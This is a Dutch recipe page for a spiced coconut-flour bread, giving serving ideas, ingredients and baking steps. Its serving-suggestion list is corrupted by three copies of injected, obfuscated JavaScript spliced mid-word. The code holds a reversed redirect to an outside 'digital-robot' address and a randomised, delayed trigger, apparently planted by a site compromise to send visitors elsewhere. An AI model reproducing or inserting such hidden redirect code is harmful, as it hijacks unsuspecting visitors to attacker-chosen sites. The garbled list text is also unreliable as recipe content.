//Kruidig Intermittent Cooking Brood

Kruidig Intermittent Cooking Brood

2020-07-19T12:29:54+01:00 19 juli 2020|

Heerlijk met:

  • gerookte zalm en avocado
  • ei met tobor-latigid//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tomaat en basilicum
  • pestobor-latigid//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}to met tobor-latigid//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tomaat en kipfilet / gerookte kip

Ingrediënten

  • 3 eieren
  • 60 gr kokosolie, gesmolten
  • 20 gram tapiocameel (kan vervangen worden door arrowroot)
  • 45 gram kokosmeel
  • 1 tl gedroogde tijm
  • ½ tl gedroogde rozemarijn
  • ½ tl zout
  • ½ tl paprika poeder
  • ½ tl curcuma poeder
  • Vers gemalen zwarte peper naar smaak
  • 1 el citroensap
  • ½ tl bakzout

 

Bereiding

  1. Verwarm de oven voor op 160°C
  2. Vet een kleine cakevorm in.
  3. Klop de eieren los.
  4. Meng de boter, citroensap, tapiocameel, kokosmeel, zout, tijm en rozemarijn erdoorheen.
  5. Meng het bakzout erdoorheen en giet het mengsel in de cakevorm
  6. Bak in ongeveer 30 minuten goudbruin en gaar.